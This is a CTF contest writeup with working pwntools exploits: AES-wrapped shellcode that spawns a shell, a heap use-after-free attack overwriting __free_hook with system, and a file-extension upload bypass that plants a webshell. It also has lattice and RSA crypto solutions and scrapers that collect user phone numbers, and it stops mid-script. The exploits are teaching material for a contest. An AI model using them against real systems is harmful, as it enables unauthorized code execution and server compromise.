Digital China Innovation Contest - Digital Security Track Writeup

admin

April 7, 2025, 23:40:09

Data Security Challenges

1. AS

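From the examples given in the challenge, it is easy to see that AS(a, d, n) denotes the sum of an arithmetic sequence with first term a, common difference d, and n terms.

According to the interaction described in the challenge, we need to find

$n_1, n_2$

satisfying

$\mathrm{0x149f} \cdot AS(1, 2, n_2) = AS(1, 1, n_1)$

(this matches the assertion in the exploit below) and

$n_1, n_2 \ge 2^{\mathrm{0x149f}}$

Summing the series, with $AS(1, 1, n_1) = n_1(n_1+1)/2$, $AS(1, 2, n_2) = n_2^2$ and $\mathrm{0x149f} = 5279$, and simplifying, the target equation is:

$n_1^2 + n_1 - 10558\, n_2^2 = 0$

Treating it as an equation in n1, the quadratic formula gives:

$n_1 = \dfrac{-1 + \sqrt{1 + 4 \cdot 10558\, n_2^2}}{2}$

Since n1 must be an integer, we need to find for the equation

$k^2 - 42232\, n_2^2 = 1$

an integer solution (k, n2). This is a Pell equation with D = 10558 × 4 = 42232, which can be solved with sagemath using continued fractions.

However, the solution obtained does not necessarily satisfy

$n_1, n_2 \ge 2^{\mathrm{0x149f}}$

so it still has to be extended.

Suppose the Pell equation has any two solutions

$(x_1, y_1), \quad (x_2, y_2)$

Since

$x_1^2 - D y_1^2 = 1, \quad x_2^2 - D y_2^2 = 1$

multiplying the left and right sides gives

$(x_1^2 - D y_1^2)(x_2^2 - D y_2^2) = 1$

which rearranges to

$(x_1 x_2 + D y_1 y_2)^2 - D (x_1 y_2 + x_2 y_1)^2 = 1$

That is:

$(x_1 x_2 + D y_1 y_2,\; x_1 y_2 + x_2 y_1)$

is also a solution of the Pell equation for this D.

Written as a matrix product, this gives the recurrence:

$\begin{pmatrix} x_{i+1} \\ y_{i+1} \end{pmatrix} = \begin{pmatrix} x_0 & D y_0 \\ y_0 & x_0 \end{pmatrix} \begin{pmatrix} x_i \\ y_i \end{pmatrix}$

So we first obtain the fundamental solution

$(x_0, y_0)$

and then iterate the recurrence until

$x_i, y_i$

are both no smaller than

$2^{\mathrm{0x149f}}$

Then $n_2 = y_i$ and $n_1 = (x_i - 1)/2$; sending these to the remote service finishes the challenge.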
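The steps above can be sketched without SageMath. The following is a minimal pure-Python sketch, assuming the relation 0x149f * n2^2 == n1 * (n1 + 1) / 2 asserted in the exploit; the helper names `pell_fundamental` and `grow` are made up for illustration, and the bound `2**64` is a small demo value rather than the challenge's real bound.

```python
from math import isqrt

def pell_fundamental(D):
    """Smallest positive (x, y) with x^2 - D*y^2 == 1, found by walking
    the convergents of the continued fraction of sqrt(D)."""
    a0 = isqrt(D)
    if a0 * a0 == D:
        raise ValueError("D must not be a perfect square")
    m, d, a = 0, 1, a0
    # Convergents p/q: start with p_{-1}/q_{-1} = 1/0 and p_0/q_0 = a0/1.
    p_prev, q_prev, p, q = 1, 0, a0, 1
    while p * p - D * q * q != 1:
        m = d * a - m
        d = (D - m * m) // d
        a = (a0 + m) // d
        p_prev, p = p, a * p + p_prev
        q_prev, q = q, a * q + q_prev
    return p, q

def grow(D, x0, y0, bound):
    """Apply (x, y) -> (x0*x + D*y0*y, y0*x + x0*y) until both reach bound."""
    x, y = x0, y0
    while x < bound or y < bound:
        x, y = x0 * x + D * y0 * y, y0 * x + x0 * y
    return x, y

C = 0x149F            # 5279, the constant from the challenge
D = 8 * C             # 42232
x0, y0 = pell_fundamental(D)
k, n2 = grow(D, x0, y0, 2**64)   # demo bound (assumption); the exploit uses 2**0x149f
n1 = (k - 1) // 2                # k is odd because D is even

assert k * k - D * n2 * n2 == 1
assert C * n2 * n2 == n1 * (n1 + 1) // 2
```

Replacing the demo bound with `2**0x149f` should reproduce the loop condition of the exploit; Python integers are arbitrary precision, so no special big-number library is needed.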

exp:

__import__('os').environ['TERM'] = 'xterm'

from pwn import *

# Solve k^2 - 42232*n2^2 == 1 via continued fractions (run under SageMath)
# Find a fundamental solution first
def Pell(D:int,lim:int = 200):
    tp = continued_fraction(sqrt(D))
    for i in range(lim):
        dd = tp.denominator(i)
        nn = tp.numerator(i)
        if nn^2 - D*dd^2 == 1:
            return nn,dd

    return None

const = 0x149f * 8
x0,y0 = Pell(const)

mt = matrix(ZZ,2,2,[x0,const*y0,y0,x0])
vc = matrix(ZZ,2,1,[x0,y0])

while vc[0,0] < 2**0x149f or vc[1,0] < 2**0x149f:
    vc = mt * vc

n2 = vc[1,0]
n1 = (vc[0,0] - 1) // 2

assert 0x149f * (n2^2) == n1 * (n1+1) // 2

io = remote('47.117.188.15',32994)
io.sendlineafter(b'choice:',b'2')
io.sendlineafter(b'n1~',str(n1).encode())
io.sendlineafter(b'n2~',str(n2).encode())
io.interactive()

Answer:

b7133d84297c307a92e70d7727f55cbc

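2. scsc

The first argument set up in start is main, which leads straight to the main logic.

Step into the first argument.

This is clearly setbuf, so move on to the next function.

It cannot be decompiled to C as it stands. NOP out the call at this location to make analysis easier; after that, the decompiler output can be cleaned up by renaming functions and variables.

The main logic is AES-128-ECB decryption plus a shellcode filter: the input is AES-decrypted and the result must not contain any forbidden bytes, so we send our shellcode AES-encrypted. Debugging shows that pop and push are allowed, so we use push/pop pairs in place of mov (which is banned). Using the register values that happen to be live at that point, we build a read call, send the getshell shellcode as a second stage, and then jmp to it.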
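As a rough illustration of the constraint, here is a minimal sketch that checks a candidate first stage against a ban list before it is padded and encrypted. The byte encoding is a hand assembly of the shellcode used in the exploit; the ban list `BANNED` is purely hypothetical (the real list has to be read out of the binary), and `forbidden_offsets` and `pkcs7_pad` are illustrative helper names.

```python
# Hand-assembled bytes of the first-stage shellcode from the exploit.
STAGE1 = bytes.fromhex(
    "57"            # push rdi        (presumably the buffer address)
    "4157"          # push r15        (presumably 0 at this point)
    "5f"            # pop  rdi        -> rdi = 0 (stdin)
    "5e"            # pop  rsi        -> rsi = buffer address
    "81c280000000"  # add  edx, 0x80  -> enlarge the read length
    "4157"          # push r15
    "58"            # pop  rax        -> rax = 0 (SYS_read)
    "0f05"          # syscall
    "ffe6"          # jmp  rsi        -> run the second stage
)

# HYPOTHETICAL ban list: a few common mov opcode bytes, for illustration only.
BANNED = {0x89, 0x8B, 0xB8}

def forbidden_offsets(code, banned=BANNED):
    """Return the offsets of all bytes of `code` that appear in `banned`."""
    return [i for i, b in enumerate(code) if b in banned]

def pkcs7_pad(data, block=16):
    """PKCS#7 padding to a multiple of `block` bytes."""
    n = block - len(data) % block
    return data + bytes([n]) * n

print(len(STAGE1), forbidden_offsets(STAGE1), len(pkcs7_pad(STAGE1)))
```

The register roles in the comments are inferred from the exploit (r15 acting as zero, rdi holding the buffer address) and should be confirmed in a debugger.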

from pwn import *
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
context(arch='amd64',log_level='debug')
file = './scsc'
io = remote('47.117.188.15',32995)
elf = ELF(file)
libc = elf.libc
# gdb.attach(io,'b *0x400C45')
s       = lambda data               :io.send(data)
sa      = lambda text,data          :io.sendafter(text, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda text,data          :io.sendlineafter(text, data)
r       = lambda num=4096           :io.recv(num)
rl      = lambda                    :io.recvline()
ru      = lambda text               :io.recvuntil(text)
uu32    = lambda                    :u32(io.recvuntil(b"\xf7")[-4:].ljust(4,b"\x00"))
uu64    = lambda                    :u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))
inf     =  lambda s                 :info(f"{s} ==> 0x{eval(s):x}")
key = b'862410c4f93b77b4'
aes = AES.new(key,AES.MODE_ECB)

shellcode = asm(
    '''
    push rdi
    push r15
    pop rdi
    pop rsi
    add edx,0x80
    push r15
    pop rax
    syscall
    jmp rsi
    '''
)
print(len(shellcode))
sla(b'magic data:\n',aes.encrypt(pad(shellcode,AES.block_size)))
pause()
s(asm(shellcraft.sh()))
# gdb.attach(io)
io.interactive()

Answer:

765157198323069450

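3. ez_upload

A simple file-extension bypass is enough. In the end, the following filename turned out to get past the backend logic:

1.jpg.jpg.php.phtml uploads successfully. Connect with AntSword and locate the RSA key file.

Answer: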

/var/www/rssss4a

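5. Boh

The usual heap menu is fully available. Pointers are not cleared after free, so there is a UAF. Large-bin-sized chunks can also be requested, so libc can be leaked directly, and the UAF is then used to overwrite the free hook.

On glibc 2.31, simply target __free_hook.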
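The tcache part of the attack can be pictured with a toy model. The sketch below is not glibc code; it is a simplified simulation of a single tcache bin as a LIFO singly linked list, with made-up addresses, showing why overwriting the `fd` of a freed chunk makes the second allocation return an attacker-chosen address.

```python
class ToyTcache:
    """Toy model of one glibc 2.31 tcache bin (LIFO singly linked list)."""

    def __init__(self):
        self.head = None   # address of the first free chunk
        self.fd = {}       # address -> "next" pointer stored in the freed chunk

    def free(self, addr):
        # A freed chunk is pushed at the head of the list.
        self.fd[addr] = self.head
        self.head = addr

    def malloc(self):
        # Pop the head; the next head is whatever fd the chunk holds.
        addr = self.head
        self.head = self.fd.get(addr)
        return addr

    def uaf_write(self, addr, value):
        """Edit-after-free: overwrite the fd pointer of a freed chunk."""
        self.fd[addr] = value

# Made-up addresses, for illustration only.
CHUNK1, CHUNK2, FREE_HOOK = 0x1000, 0x1020, 0x7F0000001E48

bin_ = ToyTcache()
bin_.free(CHUNK1)
bin_.free(CHUNK2)                    # list: CHUNK2 -> CHUNK1
bin_.uaf_write(CHUNK2, FREE_HOOK)    # list: CHUNK2 -> FREE_HOOK
first = bin_.malloc()                # returns CHUNK2
second = bin_.malloc()               # returns FREE_HOOK
print(hex(first), hex(second))
```

Freeing two chunks before poisoning mirrors the exploit: glibc 2.31 keeps a per-bin count, so two entries are needed for two allocations to be served from the bin.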

exp:

from pwn import *
context(arch='amd64',log_level='debug')
file = './boh'
io = process(file)
io = remote('47.117.32.105',32831)
elf = ELF(file)
libc = elf.libc
# gdb.attach(io)
s       = lambda data               :io.send(data)
sa      = lambda text,data          :io.sendafter(text, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda text,data          :io.sendlineafter(text, data)
r       = lambda num=4096           :io.recv(num)
rl      = lambda                    :io.recvline()
ru      = lambda text               :io.recvuntil(text)
uu32    = lambda                    :u32(io.recvuntil(b"\xf7")[-4:].ljust(4,b"\x00"))
uu64    = lambda                    :u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))
inf     =  lambda s                 :info(f"{s} ==> 0x{eval(s):x}")

menu = lambda s : sla(b'->>>>>> \n',str(s).encode())

def add(size):
    menu(1)
    sla(b'storage:\n',str(size).encode())

def free(idx):
    menu(2)
    sla(b'space: \n',str(idx).encode())

def show(idx):
    menu(3)
    sla(b'show data: \n',str(idx).encode())

def edit(idx,content):
    menu(4)
    sla(b'storage space:\n',str(idx).encode())
    sla(b'data:\n',content)

add(0x410)#0
add(0x10)#1
add(0x10)#2
free(0)
show(0)
libc.address = u64(r(6).ljust(8,b'\x00'))-0x1ecbe0
inf('libc.address')
free(1)
free(2)
__free_hook = libc.sym['__free_hook']
system = libc.sym['system']
edit(2,p64(__free_hook))
add(0x10)#3
add(0x10)#4
edit(4,p64(system))

edit(3,b'/bin/sh\x00')
free(3)
# gdb.attach(io)
io.interactive()

Answer:

725567201628166747

7. RSSA

The challenge has two parts. The first is a simple known-high-bits-of-p problem that can be attacked directly.
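To make the structure of the first part concrete, here is a toy sketch with small numbers. It swaps Coppersmith's method for plain brute force, which only works because the unknown part is tiny here; in the challenge the unknown low part is 256 bits, so `small_roots` in SageMath is used instead. The primes and the helper name `recover_p` are illustrative assumptions.

```python
def recover_p(n, p_high, unknown_bits):
    """Given the high bits of p (low bits zeroed), try every low part
    and return the candidate that divides n, or None."""
    for low in range(1 << unknown_bits):
        cand = p_high + low
        if cand > 1 and n % cand == 0:
            return cand
    return None

# Toy parameters (not from the challenge).
p, q = 1000003, 104729
n = p * q
unknown_bits = 10
p_high = (p >> unknown_bits) << unknown_bits   # what the challenge leaks as `a`

found = recover_p(n, p_high, unknown_bits)
print(found, n // found)
```

The shape matches the script that follows: `a` plays the role of `p_high`, and the recovered low part is added to it to obtain p.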

from Crypto.Util.number import long_to_bytes, inverse

a = 0xb0ee0627166579753f354ced7cdb6701a5ebbfaec3cd6af76decc33f95a765bd7e5f758e2076c42a76f5af867152757b97242034693f309973ffdebe4a5ce3dd822260dfa8a8d51f9aac7550474a3a4fe37ecea6cdc23b0cbba5aa6d0d93e9b10000000000000000000000000000000000000000000000000000000000000000
n = 0x6b9f0bf43d3e9b3278d52b3cfaafadf9449048f8297fedf8f8909a030156a23c68552b5379adbf32fd9584aa42f694c8227d275f40391c7872400eda97c2b79f8349af6492c7b6ac12bae303cee1eb9b6059e5891a6535ca8310e9ba145b7b4d403d8e666e5a55a94e5f7dabe22b80032e936233d7a1f0e96b95aeb4249b8ea34ef8bf422ce9f725844478ee15b739dd70cc6e2c0bd0cb24d7d14baf66c5aca2023c24339d3b90eecb0e2568c148d438a5ce84270ce11159e3aa4d48ac8b2185c2fe8cb328e8f80602c9d7ae49799538154d325700349bb7cd2fb694fb9f8cbcf2ebced8f6c29a05c64aa78a036416c28e6e7b937a371c98feed2d826ca9ed63
c = 0x4dba2f194b97d4dac89548c035bf18d708fb9edfd6b7706e6d7871c6129931cde88718bdcbd1e8410f1e7a4c709bdf9d31572ee371816e1d11e15e491d843a7277684202bc45e23f9f1b2e3a808bde94343a47a6a22b339aa651568ff55994260039defd790c0eb0abcf90730ecf3e097316ca87e607974544866a54d23aaaf2d089e346a68437a55afc4750b9ea1d7efcb7a6fd55c694a168f186531f0e8abb2dee73ff50ebeb2a39e1e9842013dc410e09987783cdd8e234a55388fffc025b1fe3b4036d6181ac8e6ec4d9c0822c012ac861b242b2c94433209369d0f271110d007202118e566646940f12179ee05b4e1b3c1871f09a4dbfe381d625c1166a

# R.<pl> = Zmod(n)[]
# f = a + pl
# f.small_roots(X = 2 ^ 256, beta = 0.4)

# [110067511155576927475483955985691251899018061510394100496162045480774969932831]

p = a + 110067511155576927475483955985691251899018061510394100496162045480774969932831
assert n % p == 0
q = n // p
d = inverse(65537, (p - 1) * (q - 1))
print(long_to_bytes(pow(c, d, n)))
print(p)

'''
b'Ohhhh~You get hint!!!Keep in mind~[n = 45]'
124244317712525284357780325725633529145442802066864254394159544562504647929416536939991846331828441162268585119609117368160118503713080527398014673283356965061627021101171796247132206953865749974908694380616197458412945773485258798886381229108254245680238940045643980836534956149948805469173754582822299450399
'''

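The second part is actually an aHSSP (affine hidden subset sum problem).

The derivation goes as follows, using the names from the exploit below: $h$ and $e$ are the given vectors of length 195, $X$ is the hidden 0/1 matrix, $s$ is the hidden coefficient vector of length $n = 45$, and the relation consistent with the last step of the exploit is $h \equiv X s - \mathrm{flag} \cdot e \pmod p$.

We can find a matrix M satisfying

$M h \equiv 0 \pmod p, \quad M e \equiv 0 \pmod p$

by building the following lattice, reducing it with LLL, and keeping the rows whose first two entries are zero:

$L_1 = \begin{pmatrix} p\,h & p\,e & I_{195} \end{pmatrix}$

The M obtained here is actually a 195x195 matrix. Because the entries of X are all 0 or 1, we can try looking for X in the right kernel of M (M should really be 150x195, since 195 - 45 = 150, so we only take its first 150 rows).

Again this is done by building a lattice and keeping the rows whose first 150 entries are zero:

$L_2 = \begin{pmatrix} p\,M_{[:150]}^{T} & I_{195} \end{pmatrix}$

Note that the X obtained here is not the real X (see the orthogonal-lattice blog series for details), but that does not matter much.

https://suhanhan-cpu.github.io/2024/12/25/%E6%AD%A3%E4%BA%A4%E6%A0%BC/

Since our final goal is the flag, there is still

$s$

which is unknown.

Here we can look for another matrix, $M_e$, satisfying

$M_e e \equiv 0 \pmod p$

by building the following lattice and keeping the rows whose first entry is zero:

$L_3 = \begin{pmatrix} p\,e & I_{195} \end{pmatrix}$

This $M_e$ satisfies

$M_e h \equiv M_e X s \pmod p$

where only

$s$

is unknown, so solve_right gives it directly. After that only the flag is unknown, and it can be solved for directly from a single coordinate.

exp: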

from Crypto.Util.number import long_to_bytes, inverse
import sys

m = 195
p = 124244317712525284357780325725633529145442802066864254394159544562504647929416536939991846331828441162268585119609117368160118503713080527398014673283356965061627021101171796247132206953865749974908694380616197458412945773485258798886381229108254245680238940045643980836534956149948805469173754582822299450399
n = 45
e = [120635576780857099657620422019491667950637170186261766488249957828101239821610861518495961975710066638520498229677519800712633055043550730643234194347835439199667651171556101367356729814929996606786087277351926872195105074654968586964552478307790575605576014239366139242875073444131258126343424336890783150309, 
........,     16570857330001161437081797539745235338452074798277781589774705553122533105850958634339195895311067183300988106765263243795546563100147007547647005974776204361881593633909132021169586592129671672598144891664471653825793606919922500965579833270962102770368923656499510042162125178062583146066422387408158422047]
# h = Matrix(ZZ, 195, 1, h)
# e = Matrix(ZZ, 195, 1, e)

h = vector(h)
e = vector(e)
L = block_matrix(ZZ, [[matrix((h, e)).T, matrix.identity(195)], 
                      
])
L[:, :2] *= p
L = L.LLL()
res = []
for row in L:
    if row[:2] == 0:
        res.append(row[2:])
M = matrix(res)
# print(M.nrows())  #195
# print(M.ncols())  #195


assert all(i == 0 for i in M * h % p)
assert all(i == 0 for i in M * e % p)

L = block_matrix(ZZ, [[matrix(M[ : 150]).T, matrix.identity(195)]])
L[:, :150] *= p
L = L.LLL()
res = []
for row in L:
    if row[:150] == 0:
        res.append(row[150:])
X = matrix(res).T


L = block_matrix(ZZ, [[matrix(e).T, matrix.identity(195)], 
                      
])
L[:, :1] *= p
L = L.LLL()
res = []
for row in L:
    if row[0] == 0:
        res.append(row[1:])
Me = matrix(res)
assert all(i == 0 for i in Me * e % p)



s = (Me * matrix(GF(p), X)).solve_right(Me * h)
flag = (X * s - h)[0] / e[0]
print(long_to_bytes(int(flag)))

#b'card:4111111111111123,exp_date:2025-12'

Finally, take the MD5 of the result.
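A minimal sketch of that last step with the standard library is given here. The writeup does not say exactly which bytes were hashed (the whole recovered string or only part of it), so the input below is an assumption and no expected digest is claimed.

```python
import hashlib

def md5_hex(data: bytes) -> str:
    """Return the 32-character lowercase MD5 hex digest of `data`."""
    return hashlib.md5(data).hexdigest()

# Assumption: the full recovered plaintext is what gets hashed.
recovered = b'card:4111111111111123,exp_date:2025-12'
digest = md5_hex(recovered)
print(digest)
```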

Answer:

a01f461a6ca2936342b269b55e8de03e

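Model Security Challenges

1. Data Preprocessing Task 1

Have GPT write the scripts, in two parts. The first does the sentiment classification with sklearn, using the model supplied with the poisoning challenge. The second is a crawler; parsing the HTML with BeautifulSoup is enough.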

import hashlib
from bs4 import BeautifulSoup
from app import ChineseSentimentAnalyzer, analyzer
import requests
import csv
from typing import List, Dict, Optional

class ReviewScraper:
    """Scrapes and processes product reviews."""

    def __init__(self):
        self.data: List[List[str]] = []

    @staticmethod
    def generate_md5(text: str) -> str:
        """Compute the 32-character lowercase MD5 hex digest of a string.

        Args:
            text: The string to hash.

        Returns:
            The 32-character lowercase MD5 hex digest.
        """
        return hashlib.md5(text.encode('utf-8')).hexdigest()

    def parse_review_item(self, item) -> Optional[Dict[str, str]]:
        """Parse a single review item.

        Args:
            item: A review element parsed by BeautifulSoup.

        Returns:
            A dict with the review fields, or None if parsing fails.
        """
        try:
            user_id = item.find('span', class_='user-id').get_text(strip=True).replace('用户ID：', '')
            username = item.find('span', class_='reviewer-name').get_text(strip=True).replace('用户名：', '')
            phone = item.find('span', class_='reviewer-phone').get_text(strip=True).replace('联系电话：', '')
            content = item.find('div', class_='review-content').get_text(strip=True)

            signature = self.generate_md5(user_id + username + phone)
            label = analyzer.analyze_comment_with_confidence(content)["sentiment"]

            return {
                "user_id": user_id,
                "username": username,
                "phone": phone,
                "content": content,
                "signature": signature,
                "label": label
            }
        except Exception as e:
            print(f"Error parsing review item: {e}")
            return None

    def process_page(self, html: str) -> None:
        """Process the HTML of a single page.

        Args:
            html: The HTML string to parse.
        """
        soup = BeautifulSoup(html, 'html.parser')
        review_items = soup.find_all('div', class_='review-item')

        for item in review_items:
            result = self.parse_review_item(item)
            if result:
                self.data.append([
                    result["user_id"],
                    int(result["label"]),
                    result["signature"]
                ])

    def scrape_pages(self, start: int, end: int, base_url: str) -> None:
        """Scrape the pages in the given range.

        Args:
            start: First page number.
            end: Last page number (inclusive).
            base_url: URL format string containing one {} for the page number.
        """
        for i in range(start, end + 1):
            try:
                url = base_url.format(i)
                response = requests.get(url)
                response.raise_for_status()

                self.process_page(response.text)
                print(f"Processed page {i}")
            except requests.RequestException as e:
                print(f"Error fetching page {i}: {e}")

    def save_to_csv(self, filename: str) -> None:
        """Save the collected data to a CSV file.

        Args:
            filename: Name of the output file.
        """
        with open(filename, "w", newline="", encoding="utf-8") as f:
            writer = csv.writer(f)
            writer.writerows(self.data)
        print(f"Data saved to {filename}")

if __name__ == "__main__":
    scraper = ReviewScraper()
    scraper.scrape_pages(
        start=1,
        end=500,
        base_url="http://47.117.188.170:33073/index.php?controller=product&action=detail&id={}"
    )
    scraper.save_to_csv("output.csv")

app.py

import re
import jieba
import joblib
from sklearn.feature_extraction.text import TfidfVectorizer
from typing import Dict, Any, Optional, Union
from pathlib import Path

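class ChineseSentimentAnalyzer:
    """Chinese sentiment analyzer wrapping preprocessing, feature extraction, and prediction."""

    def __init__(self, model_path: Union[str, Path], vectorizer_path: Union[str, Path]):
        """Initialize the sentiment analyzer.

        Args:
            model_path: Path to the trained model file (.pkl).
            vectorizer_path: Path to the TF-IDF vectorizer file (.pkl).

        Raises:
            FileNotFoundError: If a file does not exist.
            ValueError: If the loaded model or vectorizer is invalid.
        """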
        self.model = self._load_pickle(model_path, "model")
        self.vectorizer = self._load_pickle(vectorizer_path, "vectorizer")

    @staticmethod
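    def _load_pickle(file_path: Union[str, Path], resource_type: str) -> Any:
        """Load a pickle file with basic error handling.

        Args:
            file_path: Path to the pickle file.
            resource_type: Description of the resource (used in error messages).

        Returns:
            The loaded object.

        Raises:
            FileNotFoundError: If the file does not exist.
            ValueError: If the loaded object is invalid.
        """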
        try:
            with open(file_path, 'rb') as f:
                obj = joblib.load(f)
                if obj is None:
                    raise ValueError(f"Loaded {resource_type} is None")
                return obj
        except FileNotFoundError:
            raise FileNotFoundError(f"{resource_type.capitalize()} file not found at {file_path}")
        except Exception as e:
            raise ValueError(f"Failed to load {resource_type}: {str(e)}")

    @staticmethod
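    def preprocess_text(text: str) -> str:
        """Preprocess Chinese text.

        Args:
            text: The raw text.

        Returns:
            The preprocessed text (tokens joined by spaces).
        """
        # Remove special characters, punctuation, and digits (keep CJK characters only)
        cleaned_text = re.sub(r'[^\u4e00-\u9fa5]', '', text)
        # Segment with jieba and rejoin with spaces
        return ' '.join(jieba.cut(cleaned_text))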

    def analyze_sentiment(self, text: str) -> int:
        """Predict the sentiment of a Chinese text.

        Args:
            text: The text to analyze.

        Returns:
            The sentiment label (0 for negative, 1 for positive).

        Raises:
            ValueError: If the input text is empty.
        """
        if not text or not text.strip():
            raise ValueError("Input text cannot be empty")

        processed_text = self.preprocess_text(text)
        text_vector = self.vectorizer.transform([processed_text])
        return self.model.predict(text_vector)[0]

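    def analyze_comment_with_confidence(self, comment: str) -> Dict[str, Any]:
        """Predict the sentiment of a Chinese review, with confidence information.

        Args:
            comment: The review text to analyze.

        Returns:
            A dict with the analysis result:
            {
                'text': the original text,
                'sentiment': sentiment label (0/1),
                'confidence': confidence (0-1),
                'error': error message (if any)
            }
        """
        try:
            if not comment or not comment.strip():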
                raise ValueError("Comment text cannot be empty")

            processed_text = self.preprocess_text(comment)
            text_vector = self.vectorizer.transform([processed_text])

            result = {
                'text': comment,
                'sentiment': self.model.predict(text_vector)[0]
            }

            # Add a confidence value if the model supports probability prediction
            if hasattr(self.model, 'predict_proba'):
                proba = self.model.predict_proba(text_vector)[0]
                result['confidence'] = float(max(proba))

            return result
        except Exception as e:
            return {
                'text': comment,
                'error': str(e)
            }

def create_analyzer(model_path: Union[str, Path],
                    vectorizer_path: Union[str, Path]) -> ChineseSentimentAnalyzer:
    """Create a ChineseSentimentAnalyzer instance.

    Args:
        model_path: Path to the model file.
        vectorizer_path: Path to the vectorizer file.

    Returns:
        A ChineseSentimentAnalyzer instance.
    """
    return ChineseSentimentAnalyzer(model_path, vectorizer_path)

analyzer = create_analyzer(
    model_path="./models/sentiment_model.pkl",
    vectorizer_path="./models/tfidf_vectorizer.pkl"
)

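Finally, sort by user_id manually in Excel and add the header row.

Answer: file submitted.

2. Data Preprocessing Task 2

First, use the requests library to walk through all pages (1 to 84) and collect each product's ID, name, and sales figure. Sales values that are non-numeric or negative are converted to 0. Then visit each product's detail page to count the user reviews. Finally, match the category ID from keywords in the product name. The script is as follows: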

import requests
from bs4 import BeautifulSoup
import csv
import time

# Configuration
base_url = 'http://47.117.188.15:33001/index.php?controller=home&action=index&page={}'
detail_url_template = 'http://47.117.188.15:33001/index.php?controller=product&action=detail&id={}'

# Category keyword table (tuned)
category_keywords = {
    1: ['手机', '智能机', '通话', 'ONEPLUS', 'Ace', '天玑', '旗舰', '快充','音量','Phone','性能','折叠屏','复古','自拍'],
    2: ['母婴', '婴儿', '孕妇', '奶粉', '尿布', '童装'],
    3: ['家居', '家装', '家具', '沙发', '窗帘', '家饰'],
    4: ['书', '书籍', '著作', '出版', '科普', '科学著作','描绘','探讨','分析','叙','情节','讲述','背景','展现','宏观'],
    5: ['蔬菜', '青菜', '生菜', '白菜', '萝卜', '黄瓜'],
    6: ['厨房', '厨具', '锅', '刀具', '电磁炉'],
    7: ['办公', '打印机', '文具', '复印机'],
    8: ['水果', '苹果', '香蕉', '芒果', '桑葚', '葡萄','西瓜','草莓','猕猴桃','果肉','果实','哈密瓜','果皮'],
    9: ['宠物', '狗粮', '猫砂', '宠物用品', '鱼缸'],
    10: ['运动', '跑步', '健身', '瑜伽', '球类'],
    11: ['热水器', '速热', '恒温', '节能防干烧', '卫浴','壁挂','防漏电'],
    12: ['彩妆', '口红', '眼影', '粉底', '化妆品','香水'],
    13: ['保健品', '维生素', '钙片', '蛋白粉'],
    14: ['酒', '酒水', '啤酒', '白酒', '葡萄酒'],
    15: ['玩具', '乐器', '积木', '钢琴', '吉他'],
    16: ['汽车', '车饰', '车载', '轮胎'],
    17: ['床单', '被套', '枕头', '床垫', '床上用品'],
    18: ['洗发水', '沐浴露', '护发素', '洗护','清洁','滋养'],
    19: ['五金', '螺丝', '钳子', '电钻'],
    20: ['户外', '帐篷', '登山', '露营'],
    21: ['珠宝', '钻石', '项链', '戒指'],
    22: ['医疗', '器械', '体温计', '血压计'],
    23: ['花卉', '花卉园艺', '盆栽', '花盆'],
    24: ['游戏', '游戏机', '电竞', 'PS5'],
    25: ['园艺', '修剪', '花园工具', '园林']
}

# Build the keyword list and sort it by length, longest first
keywords_list = []
for cid, keys in category_keywords.items():
    for key in keys:
        keywords_list.append((key, cid))
keywords_list.sort(key=lambda x: len(x[0]), reverse=True)

def get_category_id(name):
    for keyword, cid in keywords_list:
        if keyword in name:
            return cid
    return 1  # default value; needs manual review

# Crawl the product list
product_list = []
for page in range(1, 85):
    print(f"Crawling page {page}...")
    try:
        response = requests.get(base_url.format(page))
        soup = BeautifulSoup(response.text, 'html.parser')
        for card in soup.find_all('div', class_='product-card'):
            product_id = int(card['data-id'])
            name = card.find(class_='product-name').text.strip()
            sales_text = card.find(class_='product-sales').text.strip()
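            # Normalize sales: non-numeric or negative values become 0
            # (assumption: a negative value is written with a '-' sign)
            digits = ''.join(filter(str.isdigit, sales_text))
            sales = int(digits) if digits and '-' not in sales_text else 0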
            product_list.append({
                'product_id': product_id,
                'name': name,
                'sales': sales,
                'reviews': None  # filled in later
            })
        time.sleep(0.5)
    except Exception as e:
        print(f"Error on page {page}: {e}")

# Match categories
for product in product_list:
    product['category_id'] = get_category_id(product['name'])

# Sort and write the CSV
product_list.sort(key=lambda x: x['product_id'])
with open('submit_2.csv', 'w', newline='', encoding='utf-8') as f:
    writer = csv.writer(f)
    # writer.writerow(['product_id', 'sales', 'category_id', 'reviews'])
    writer.writerow(['product_id', 'sales', 'category_id'])
    for p in product_list:
        # writer.writerow([p['product_id'], p['sales'], p['category_id'], p['reviews']])
        writer.writerow([p['product_id'], p['sales'], p['category_id']])

print("Done! Results saved to submit_2.csv")

Answer: the CSV file was uploaded.
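Two details of this task are easy to get wrong, so here is a small standalone sketch of both. It assumes that a negative sales value is written with a leading minus sign and that the label text around the number is free-form; `normalize_sales` and `match_category` are illustrative names, not part of the original script. Note that a digits-only filter would read "-5" as 5, which is why the sign is handled explicitly here.

```python
import re

def normalize_sales(text):
    """Return the sales figure as a non-negative int.
    Missing, malformed, or negative values become 0."""
    m = re.search(r"-?\d+", text)
    if m is None:
        return 0
    return max(0, int(m.group()))

def match_category(name, category_keywords, default=None):
    """Return the category id of the longest keyword contained in `name`."""
    pairs = sorted(
        ((kw, cid) for cid, kws in category_keywords.items() for kw in kws),
        key=lambda pair: len(pair[0]),
        reverse=True,   # longest keyword first, so '葡萄酒' beats '葡萄' and '酒'
    )
    for kw, cid in pairs:
        if kw in name:
            return cid
    return default

# Tiny illustrative keyword table (a subset in the style of the script's table).
demo_keywords = {14: ["酒", "葡萄酒"], 8: ["葡萄"]}
print(normalize_sales("销量：-5"), match_category("法国葡萄酒", demo_keywords))
```

Matching the longest keyword first is the same design choice as the sorted `keywords_list` in the script: it keeps a short, generic keyword from shadowing a more specific one.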

3. Data Preprocessing Task 3

Again, have GPT generate the script.

robot.py

import hashlib
from bs4 import BeautifulSoup
import requests
import csv
from typing import List, Dict, Optional
from dataclasses import dataclass
import waf

@dataclass
class ReviewData:
    """Holds the data of a single review."""
    user_id: str
    username: str
    phone: str
    content: str
    signature: str
    user_agent: str

class ReviewScraper:
    """Product review scraper and analyzer."""

    def __init__(self):
        self.data: List[List[str]] = []
        self.waf = waf.WAF()

    @staticmethod
    def mask_phone(phone: str) -> str:
        """Mask a phone number, keeping the first 3 and last 4 digits.

        Args:
            phone: The original phone number string.

        Returns:
            The masked phone number string.
        """
